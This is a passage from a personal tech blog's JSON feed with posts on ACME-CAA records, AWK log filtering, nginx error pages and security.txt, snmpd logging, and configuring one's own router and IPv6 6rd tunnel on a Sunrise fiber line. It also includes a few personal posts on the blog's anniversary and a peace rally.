introduced support for ACME-CAA.
I've now extended my existing CAA DNS entries with the ACME-CAA properties:
% dig +short -t CAA x-way.org0 issue \"letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/68891730; validationmethods=http-01\"0 issue \"letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/605777876; validationmethods=http-01\"
The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).
If the certificate request comes from a different account, no TLS certificate will be granted.
This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.
Addendum:
In case you're wondering where to get the accounturi value from, it can be found in your account file:
% cat /etc/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory/*/regr.json{\"body\": {}, \"uri\": \"https://acme-v02.api.letsencrypt.org/acme/acct/605777876\"}", "url": "https://blog.x-way.org/Networking/2023/01/18/ACME-CAA.html", "tags": ["Networking"], "date_published": "2023-01-18T23:06:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324310", "title": "JSON Feed", "content_text": "Added a JSON Feed to this blog (in additon to the existing RSS and Atom feeds): https://blog.x-way.org/feed.jsonTo build the proper JSON file, I used this Jekyll template and the JSON Feed validator.", "content_html": "
Added a JSON Feed to this blog (in additon to the existing RSS and Atom feeds): https://blog.x-way.org/feed.json
To build the proper JSON file, I used this Jekyll template and the JSON Feed validator.
", "url": "https://blog.x-way.org/Webdesign/2023/01/10/JSON-Feed.html", "tags": ["Webdesign"], "date_published": "2023-01-10T21:51:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324309", "title": "Get last 24h of logs with AWK", "content_text": "For a temporary log analysis task, I wanted to get the last 24h of logs from a Postfix logfile.To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):awk -F '[ :]+' 'BEGIN{m=split(\"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\",d,\"|\"); for(o=1;o<=m;o++){months[d[o]]=sprintf(\"%02d\",o)}} mktime(strftime(\"%Y\")\" \"months[$1]\" \"sprintf(\"%02d\",$2+1)\" \"$3\" \"$4\" \"$5) > systime()'This is then used in a cronjob to get a pflogsumm summary of the last 24h: cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split(\"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\",d,\"|\"); for(o=1;o<=m;o++){months[d[o]]=sprintf(\"%02d\",o)}} mktime(strftime(\"%Y\")\" \"months[$1]\" \"sprintf(\"%02d\",$2+1)\" \"$3\" \"$4\" \"$5) > systime()' | pflogsumm", "content_html": "For a temporary log analysis task, I wanted to get the last 24h of logs from a Postfix logfile.
To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):
awk -F '[ :]+' 'BEGIN{m=split(\"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\",d,\"|\"); for(o=1;o<=m;o++){months[d[o]]=sprintf(\"%02d\",o)}} mktime(strftime(\"%Y\")\" \"months[$1]\" \"sprintf(\"%02d\",$2+1)\" \"$3\" \"$4\" \"$5) > systime()'
This is then used in a cronjob to get a pflogsumm summary of the last 24h:
cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split(\"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\",d,\"|\"); for(o=1;o<=m;o++){months[d[o]]=sprintf(\"%02d\",o)}} mktime(strftime(\"%Y\")\" \"months[$1]\" \"sprintf(\"%02d\",$2+1)\" \"$3\" \"$4\" \"$5) > systime()' | pflogsumm
",
"url": "https://blog.x-way.org/Linux/2023/01/03/Get-last-24h-of-logs-with-AWK.html",
"tags": ["Linux"],
"date_published": "2023-01-03T14:40:00+00:00"
},
{
"id": "http://waterwave.ch/weblog/detail.php?id=324308",
"title": "Happy New Year 2023",
"content_text": "As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)",
"content_html": "As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)
", "url": "https://blog.x-way.org/Misc/2022/12/31/Happy-New-Year-2023.html", "tags": ["Misc"], "date_published": "2022-12-31T13:59:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324307", "title": "Alpha Bravo Charlie", "content_text": "While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long IBANs via poor-quality call-center phonelines).As it has been a while since I last used it, I created a handy table to quickly lookup the code words: nato.sigint.chSpecial feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)# curl nato.sigint.chA Alpha S SierraB Bravo T TangoC Charlie U UniformD Delta V VictorE Echo W WhiskeyF Foxtrot X X-rayG Golf Y YankeeH Hotel Z ZuluI India 0 ZeroJ Juliett 1 OneK Kilo 2 TwoL Lima 3 ThreeM Mike 4 FourN November 5 FiveO Oscar 6 SixP Papa 7 SevenQ Quebec 8 EightR Romeo 9 Niner", "content_html": "While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long IBANs via poor-quality call-center phonelines).
As it has been a while since I last used it, I created a handy table to quickly lookup the code words: nato.sigint.ch
Special feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)
# curl nato.sigint.chA Alpha S SierraB Bravo T TangoC Charlie U UniformD Delta V VictorE Echo W WhiskeyF Foxtrot X X-rayG Golf Y YankeeH Hotel Z ZuluI India 0 ZeroJ Juliett 1 OneK Kilo 2 TwoL Lima 3 ThreeM Mike 4 FourN November 5 FiveO Oscar 6 SixP Papa 7 SevenQ Quebec 8 EightR Romeo 9 Niner", "url": "https://blog.x-way.org/Misc/2022/12/25/Alpha-Bravo-Charlie.html", "tags": ["Misc"], "date_published": "2022-12-25T22:11:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324306", "title": "How to Exit Vim", "content_text": "(via)", "content_html": "
(via)
", "url": "https://blog.x-way.org/Linux/2022/08/07/How-to-Exit-Vim.html", "tags": ["Linux"], "date_published": "2022-08-07T22:19:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324305", "title": "Add node to MongoDB cluster", "content_text": "To add a new node to an existing MongoDB cluster, login to the mongo shell on the primary node and run the following command:rs.add({host:\"mongodb3.example.net:27017\"})Similar to remove a node from the cluster, use:rs.remove(\"mongodb3.example.net:27017\")", "content_html": "To add a new node to an existing MongoDB cluster, login to the mongo shell on the primary node and run the following command:
rs.add({host:\"mongodb3.example.net:27017\"})
Similar to remove a node from the cluster, use:
rs.remove(\"mongodb3.example.net:27017\")", "url": "https://blog.x-way.org/Linux/2022/07/06/Add-node-to-MongoDB-cluster.html", "tags": ["Linux"], "date_published": "2022-07-06T22:14:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324304", "title": "Custom nginx error pages", "content_text": "For quite some time I've been using custom nginx error pages on this site.My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.error_page 429 @custom_error_429;location @custom_error_429 {\tinternal;\tmore_set_headers 'Content-Type: text/html';\techo '<html>...</html>';}Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.Some searching lead to the One NGINX error page to rule them all article which describes an alternative approach leveraging the nginx SSI module to generate the error pages on the fly.Instead of generating and defining a specific error page for each error, a single error page is used for all errors.error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 421 422 423 424 425 426 428 429 431 451 500 501 502 503 504 505 506 507 508 510 511 /error.html;location = /error.html {\tssi on;\tinternal;\troot /var/www/default;}nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.For this we define a mapping of status codes to the error messages.map $status $status_text { 400 'Bad Request'; 401 'Unauthorized'; 402 'Payment Required'; 403 'Forbidden'; 404 'Not Found'; 405 'Method Not Allowed'; 406 'Not Acceptable'; 407 'Proxy Authentication Required'; 408 'Request Timeout'; 409 'Conflict'; 410 'Gone'; 411 'Length Required'; 412 'Precondition Failed'; 413 'Payload Too Large'; 414 'URI Too Long'; 415 'Unsupported Media Type'; 416 'Range Not Satisfiable'; 417 'Expectation Failed'; 418 'I\\'m a teapot'; 421 'Misdirected Request'; 422 'Unprocessable Entity'; 423 'Locked'; 424 'Failed Dependency'; 425 'Too Early'; 426 'Upgrade Required'; 428 'Precondition Required'; 429 'Too Many Requests'; 431 'Request Header Fields Too Large'; 451 'Unavailable For Legal Reasons'; 500 'Internal Server Error'; 501 'Not Implemented'; 502 'Bad Gateway'; 503 'Service Unavailable'; 504 'Gateway Timeout'; 505 'HTTP Version Not Supported'; 506 'Variant Also Negotiates'; 507 'Insufficient Storage'; 508 'Loop Detected'; 510 'Not Extended'; 511 'Network Authentication Required'; default 'Something went wrong';}Now we have the status and the status_text variables available in our error.html page.<html><body><h1><!--# echo var=\"status\" default=\"\" --> <!--# echo var=\"status_text\" default=\"Something went wrong\" --></h1></body></html>", "content_html": "
For quite some time I've been using custom nginx error pages on this site.
My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.
As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.
error_page 429 @custom_error_429;location @custom_error_429 {\tinternal;\tmore_set_headers 'Content-Type: text/html';\techo '<html>...</html>';}
Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.
Some searching lead to the One NGINX error page to rule them all article which describes an alternative approach leveraging the nginx SSI module to generate the error pages on the fly.
Instead of generating and defining a specific error page for each error, a single error page is used for all errors.
error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 421 422 423 424 425 426 428 429 431 451 500 501 502 503 504 505 506 507 508 510 511 /error.html;location = /error.html {\tssi on;\tinternal;\troot /var/www/default;}
nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.
For this we define a mapping of status codes to the error messages.
map $status $status_text { 400 'Bad Request'; 401 'Unauthorized'; 402 'Payment Required'; 403 'Forbidden'; 404 'Not Found'; 405 'Method Not Allowed'; 406 'Not Acceptable'; 407 'Proxy Authentication Required'; 408 'Request Timeout'; 409 'Conflict'; 410 'Gone'; 411 'Length Required'; 412 'Precondition Failed'; 413 'Payload Too Large'; 414 'URI Too Long'; 415 'Unsupported Media Type'; 416 'Range Not Satisfiable'; 417 'Expectation Failed'; 418 'I\\'m a teapot'; 421 'Misdirected Request'; 422 'Unprocessable Entity'; 423 'Locked'; 424 'Failed Dependency'; 425 'Too Early'; 426 'Upgrade Required'; 428 'Precondition Required'; 429 'Too Many Requests'; 431 'Request Header Fields Too Large'; 451 'Unavailable For Legal Reasons'; 500 'Internal Server Error'; 501 'Not Implemented'; 502 'Bad Gateway'; 503 'Service Unavailable'; 504 'Gateway Timeout'; 505 'HTTP Version Not Supported'; 506 'Variant Also Negotiates'; 507 'Insufficient Storage'; 508 'Loop Detected'; 510 'Not Extended'; 511 'Network Authentication Required'; default 'Something went wrong';}
Now we have the status and the status_text variables available in our error.html page.
<html><body><h1><!--# echo var=\"status\" default=\"\" --> <!--# echo var=\"status_text\" default=\"Something went wrong\" --></h1></body></html>", "url": "https://blog.x-way.org/Webdesign/2022/06/19/Custom-nginx-error-pages.html", "tags": ["Webdesign"], "date_published": "2022-06-19T09:48:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324303", "title": "nitter", "content_text": "nitter provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).The source code for it is available on GitHub.It does a direct mapping of the profile URLs, thus https://twitter.com/sheeshee becomes https://nitter.net/sheeshee", "content_html": "
nitter provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).
The source code for it is available on GitHub.
It does a direct mapping of the profile URLs, thus https://twitter.com/sheeshee
becomes https://nitter.net/sheeshee
On the occasion of the 20th anniversary of this blog, I've used archive.org to reconstruct the original HTML layout from back in the time and applied it to the Jekyll templates.
Enjoy the blog in all the (<table> based) glory from 2002 :-)
", "url": "https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html", "tags": ["Webdesign"], "date_published": "2022-06-04T11:32:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324301", "title": "Happy 20th Birthday x-log", "content_text": "On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making the second entry the first one in the archive of June 2002).Compared to 20 years ago, the about page no longer needs to explain what a weblog is.Interesting though that the linked definition of a weblog from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)From the list of linked Blogs in 2002, only deep-resonance aka mk is still active, special shout-out to Markus for the continuous persistence.To the next twenty years :-)", "content_html": "On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making the second entry the first one in the archive of June 2002).
Compared to 20 years ago, the about page no longer needs to explain what a weblog is.
Interesting though that the linked definition of a weblog from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.
To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.
Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.
The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)
From the list of linked Blogs in 2002, only deep-resonance aka mk is still active, special shout-out to Markus for the continuous persistence.
To the next twenty years :-)
A while ago I wrote a little tool to set the time on MikroTik devices.It takes the current time from the local machine and does set it on the device through the API (while respecting the timezone configured on it).
I mostly use it to set the proper time when the device time was completely off (when setting up a new device or when it has been powered off for a long time).Afterwards NTP should take care of keeping the time in sync.
The tool is now available on GitHub together with installation and usage instructions: mt-set-time
", "url": "https://blog.x-way.org/Networking/2022/03/26/mt-set-time.html", "tags": ["Networking"], "date_published": "2022-03-26T16:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324299", "title": "Fight Putin - Ride a Bike", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2022/03/15/Fight-Putin-Ride-a-Bike.html", "tags": ["Misc"], "date_published": "2022-03-15T12:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324298", "title": "Dr Putin isch", "content_text": "(via)", "content_html": "(via)
", "url": "https://blog.x-way.org/Music/2022/02/27/Dr-Putin-isch.html", "tags": ["Music"], "date_published": "2022-02-27T11:53:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324297", "title": "Non Ă la guerre! Nein zum Krieg!", "content_text": "Today I went to Bern to the rally for peace.My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).Swiss media reported that this was the largest rally for peace in Switzerland since the rallies against the war in Iraq in 2003. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.Clearly we as human species did not progress enough on this topic :-(Besides showing up to the rally, I also did donate to the ICRC to provide humanitarian aid and I do encourage you to do the same.", "content_html": "Today I went to Bern to the rally for peace.
My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).
Swiss media reported that this was the largest rally for peace in Switzerland since the rallies against the war in Iraq in 2003. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.
Clearly we as human species did not progress enough on this topic :-(
Besides showing up to the rally, I also did donate to the ICRC to provide humanitarian aid and I do encourage you to do the same.
", "url": "https://blog.x-way.org/Misc/2022/02/26/Non-a-la-guerre-Nein-zum-Krieg.html", "tags": ["Misc"], "date_published": "2022-02-26T21:22:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324296", "title": "EFF Member Badge 2022", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Badges/2022/02/20/EFF-Member-Badge-2022.html", "tags": ["Badges"], "date_published": "2022-02-20T09:22:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324295", "title": "vtysock", "content_text": "After switching my Debian hosts from Quagga to FRRouting, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: #7799).The Prometheus frr_exporter works around this by directly sending commands to the UNIX sockets of the FRR daemons (PR).To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: vtysockBy skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.", "content_html": "After switching my Debian hosts from Quagga to FRRouting, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.
This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: #7799).
The Prometheus frr_exporter works around this by directly sending commands to the UNIX sockets of the FRR daemons (PR).
To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: vtysock
By skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.
In situations where IPv6 connectivity performs better than IPv4, you might want to force SSH to use IPv6. In interactive mode this can be achieved with the -6
commandline parameter.
But in situations where you can't modify the commandline parameters a different approach is needed (for example in rsync backup scripts which use SSH as underlying transport layer).
We can use the ssh_config file to encforce that IPv6 is used for a specific host:
Host myipv6host\tAddressFamily inet6
This instructs all SSH commands to use IPv6 when connecting to myipv6host.
The same approach also works to force usage of Legacy IP by specyfing inet
as address family.
After running it for a bit more than a decade, I've now removed again the Google Analytics tracking from this site. It does not feel appropriate anymore on a personal website.
At the moment no alternative statistics solution is in place yet, but I could imagine setting up a self-hosted solution like Matomo or Plausible in the future.
Google Analytics declared illegal in the EU.
", "url": "https://blog.x-way.org/Webdesign/2022/01/19/Google-Analytics-declared-illegal-in-the-EU.html", "tags": ["Webdesign"], "date_published": "2022-01-19T20:45:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324291", "title": "Wordle", "content_text": "Wordle seems to be the trending topic these days.It's a word game similar to the french Motus game show (resp. the american Lingo game show).Wordle 200 4/6âŹâŹâŹđ©âŹâŹâŹđšđ©âŹâŹâŹâŹđ©đ©đ©đ©đ©đ©đ©", "content_html": "Wordle seems to be the trending topic these days.
It's a word game similar to the french Motus game show (resp. the american Lingo game show).
Wordle 200 4/6
âŹâŹâŹđ©âŹ
âŹâŹđšđ©âŹ
âŹâŹâŹđ©đ©
đ©đ©đ©đ©đ©
Turns out that signed 32-bit numbers can be exhausted long before Y2038, when you use them to store time in YYMMDDHHMM format. (via)
", "url": "https://blog.x-way.org/Coding/2022/01/01/Y2K22.html", "tags": ["Coding"], "date_published": "2022-01-01T21:48:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324289", "title": "Open Source on Mars", "content_text": "Received a badge from GitHub's Open Source on Mars initiative :-)", "content_html": "Received a badge from GitHub's Open Source on Mars initiative :-)
", "url": "https://blog.x-way.org/Coding/2021/04/19/Open-Source-on-Mars.html", "tags": ["Coding"], "date_published": "2021-04-19T16:21:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324288", "title": "Top 21 Security Experts to follow on Twitter in 2021", "content_text": "From the article on Security Boulevard.\tRafay Baloch\tTroy Hunt\tKevin Mitnick\tRachel Tobac\tMikko Hyppönen\tKatie Moussouris\tBruce Schneier\tBrian Krebs\tJeremiah Grossman\tEugene Kaspersky\tDan Lohemann\tSteve Morgan\tTyler Cohen Wood\tGraham Cluley\tTheresa Payton\tShira Rubinoff\tEva Galperin\tMarcus J. Carey\tJayson E Street\tPaul Asadoorian\tAdam K. Levin", "content_html": "From the article on Security Boulevard.
This website now also serves a security.txt file which is a standardized way of making security contact information available. (Wikipedia)
The file is available in two locations /security.txt (the classic location) and /.well-known/security.txt (the standard location following RFC8615).
To easily add the file on all my domains, I'm using the following nginx config snippet.
location /security.txt {\tadd_header Content-Type 'text/plain';\tadd_header Cache-Control 'no-cache, no-store, must-revalidate';\tadd_header Pragma 'no-cache';\tadd_header Expires '0';\tadd_header Vary '*';\treturn 200 \"Contact: mailto:andreas+security.txt@jaggi.info\\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\\n\";}location /.well-known/security.txt {\tadd_header Content-Type 'text/plain';\tadd_header Cache-Control 'no-cache, no-store, must-revalidate';\tadd_header Pragma 'no-cache';\tadd_header Expires '0';\tadd_header Vary '*';\treturn 200 \"Contact: mailto:andreas+security.txt@jaggi.info\\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\\n\";}
This snippet is stored in a dedicated file (/etc/nginx/conf_includes/securitytxt) and is included in the various server config blocks like this:
server {\tserver_name example.com;\tinclude /etc/nginx/conf_includes/securitytxt;\tlocation / {\t\t# rest of website\t}}", "url": "https://blog.x-way.org/Webdesign/2021/03/28/security-txt.html", "tags": ["Webdesign"], "date_published": "2021-03-28T08:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324284", "title": "Fixing 'snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)' messages", "content_text": "The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslogsnmpd[19784]: error on subcontainer 'ia_addr' insert (-1)The fix is to lower the logging level, which can be accomplished like this on systems with systemd:cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.servicesed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.servicesystemctl daemon-reloadsystemctl restart snmpdOn systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:sed -i 's/Lsd/LS6d/g' /etc/default/snmpdsed -i 's/Lsd/LS6d/g' /etc/init.d/snmpdservice snmpd restart", "content_html": "
The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslog
snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)
The fix is to lower the logging level, which can be accomplished like this on systems with systemd:
cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.servicesed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.servicesystemctl daemon-reloadsystemctl restart snmpd
On systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:
sed -i 's/Lsd/LS6d/g' /etc/default/snmpdsed -i 's/Lsd/LS6d/g' /etc/init.d/snmpdservice snmpd restart", "url": "https://blog.x-way.org/Linux/2021/02/13/Fixing-snmpd-error-on-subcontainer-ia-addr-insert-messages.html", "tags": ["Linux"], "date_published": "2021-02-13T08:57:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324285", "title": "Embracing the future with SolNet", "content_text": "This was the initial state of my new SolNet fibre connection:As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer legacy Internet (which later on I got working as well).", "content_html": "
This was the initial state of my new SolNet fibre connection:
As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer legacy Internet (which later on I got working as well).
", "url": "https://blog.x-way.org/Networking/2021/02/04/Embracing-the-future-with-SolNet.html", "tags": ["Networking"], "date_published": "2021-02-04T10:01:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324286", "title": "Prozentrechnen ist schwer", "content_text": "TrueWealth hat's nicht so mit Prozentrechnen:", "content_html": "TrueWealth hat's nicht so mit Prozentrechnen:
", "url": "https://blog.x-way.org/Misc/2021/02/04/Prozentrechnen-ist-schwer.html", "tags": ["Misc"], "date_published": "2021-02-04T08:20:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324283", "title": "Using your own router on a Sunrise fiber line", "content_text": "Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in ZĂŒrich.Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to SolNet).Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).Enough of the ranting, now to the interesting part :-)The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.For IPv6 6rd is employed, for which we need to know the prefix and gateway address.The following configuration was tested with a MikroTik CRS125 router starting from the default settings.For simplicity I've named the network interfaces according to their intended usage (eg. LAN, sunrise and 6rd).The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10./interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up./ip firewall filteradd action=accept chain=forward connection-state=established,relatedadd action=accept chain=forward in-interface=LAN out-interface=sunriseadd action=drop chain=forwardadd action=accept chain=input connection-state=established,relatedadd action=accept chain=input protocol=icmpadd action=drop chain=input in-interface=!LAN/ip firewall natadd action=masquerade chain=srcnat out-interface=sunriseNow we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface./ip dhcp-client option add code=61 name=clientid-sunrise value=\"'dslforum.org,Fast5360-sunrise'\"/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunriseThis should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet./ip dhcp-client printFlags: X - disabled, I - invalid, D - dynamic # INTERFACE USE-PEER-DNS ADD-DEFAULT-ROUTE STATUS ADDRESS 0 sunrise yes yes bound 198.51.100.123/25/ip route check 1.1 status: ok interface: sunrise nexthop: 198.51.100.1/ping count=1 1.1 SEQ HOST SIZE TTL TIME STATUS 0 1.0.0.1 56 59 1ms sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1msSunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address./ipv6 firewall filteradd action=accept chain=forward connection-state=established,relatedadd action=accept chain=forward in-interface=LANadd action=drop chain=forwardadd action=accept chain=input connection-state=established,relatedadd action=accept chain=input protocol=icmpv6add action=drop chain=inputTo setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the 2001:1710::/28 prefix and the 212.161.209.1 tunnel gateway address).The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.The script itself will be run via the scheduler, thus let's save it under the name 6rd-script.:global ipv6localinterface \"LAN\":global uplinkinterface \"sunrise\":global IPv4addr [/ip address get [find interface=$uplinkinterface] address];:global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr \"/\"]]:global IPv4addr2 [:pick $IPv4addr 0 30]:global IPv6temp [:toip6 (\"1::\" . $IPv4addr2)]:global IPv4hex1 [:pick $IPv6temp 3 4]:global IPv4hex2 [:pick $IPv6temp 4 7]:global IPv4hex3 [:pick $IPv6temp 8 9]:global IPv4hex4 [:pick $IPv6temp 9 12]:global IPv6addr [(\"2001:171\" . $IPv4hex1 . \":\". $IPv4hex2 .$IPv4hex3 . \":\" . $IPv4hex4 . \"0::1/64\")]:global IPv6addrLoc [(\"2001:171\" . $IPv4hex1 . \":\". $IPv4hex2 . $IPv4hex3 . \":\" . $IPv4hex4 . \"1::1/64\")]#6to4 interface:global 6to4id [/interface 6to4 find where name=\"6rd\"]:if ($6to4id!=\"\") do={:global 6to4addr [/interface 6to4 get $6to4id local-address]if ($6to4addr != $IPv4addr) do={ :log warning \"Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'.\"; /interface 6to4 set [find name=\"6rd\"] local-address=$IPv4addr }} else { :log warning \"Creating 6to4 interface '6rd'. \"; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name=\"6rd\" remote-address=212.161.209.1 }#ipv6 for uplink:global IPv6addrnumber [/ipv6 address find where comment=\"6rd\" and interface=\"6rd\"]:if ($IPv6addrnumber!=\"\") do={:global oldip ([/ipv6 address get $IPv6addrnumber address])if ($oldip != $IPv6addr) do={ :log warning \"Updating 6rd IPv6 from '$oldip' to '$IPv6addr'.\"; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }} else {:log warning \"Setting up 6rd IPv6 '$IPv6addr' to '6rd'. \"; /ipv6 address add 